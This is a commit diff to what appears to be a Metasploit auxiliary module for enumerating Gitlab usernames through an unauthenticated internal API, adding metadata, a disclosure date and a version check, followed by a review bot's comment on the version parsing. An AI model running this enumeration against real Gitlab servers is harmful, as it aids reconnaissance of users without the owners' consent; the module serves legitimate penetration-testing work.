Check revision

bug/bundler_fix
Meatballs 2014-12-15 17:20:23 +00:00
parent 7216f2a971
commit 1b565b0290
1 changed files with 26 additions and 8 deletions


@ -13,15 +13,23 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(
info,
'Name' => 'Gitlab User Enumeration',
'Description' => %q(
'Description' => "
The Gitlab 'internal' API is exposed unauthenticated on Gitlab. This
allows the username for each SSH Key ID number to be retrieved. Users
who do not have an SSH Key cannot be enumerated in this fashion.
),
who do not have an SSH Key cannot be enumerated in this fashion. LDAP
users, e.g. Active Directory users will also be returned.
This issue was fixed in Gitlab v7.5.0.
",
'Author' => 'Ben Campbell',
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'DisclosureDate' => 'Oct 15 2014',
'References' =>
[
[ 'URL', 'https://labs.mwrinfosecurity.com/tools/' ]
]
))
register_options(
@ -62,8 +70,17 @@ class Metasploit3 < Msf::Auxiliary
info: "Gitlab Version - #{git_version}"
)
else
print_error('Unable to retrieve Gitlab version...')
return
fail_with(Failure::Unknown, 'Unable to retrieve Gitlab version...')
end
major, minor, _ = git_version.split('.')
if major.to_i > 7
fail_with(Failure::NotVulnerable, "Version #{git_version} is not vulnerable.")
else
if major.to_i == 7 && minor.to_i >= 5
fail_with(Failure::NotVulnerable, "Version #{git_version} is not vulnerable.")
end
end
discover = normalize_uri(target_uri.path, internal_api, 'discover')
@ -91,3 +108,4 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
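Review bot: The version gate added in the second hunk repeats the same `fail_with(Failure::NotVulnerable, ...)` call in two nested branches and parses the components with `to_i`, which maps any string that does not start with a digit to 0. The two branches can be a single condition, `if major.to_i > 7 || (major.to_i == 7 && minor.to_i >= 5)`, with one `fail_with` under it. Because of the `to_i` behaviour, a version string in an unexpected format (a leading `v`, for example) would be read as major 0 and treated as an affected release. Validating it first, e.g. `fail_with(Failure::Unknown, "Unexpected version format: #{git_version}") unless git_version =~ /\A\d+\.\d+/`, would report that case instead of guessing. The enclosing method starts and ends outside the hunk, so how `git_version` is extracted is not visible here.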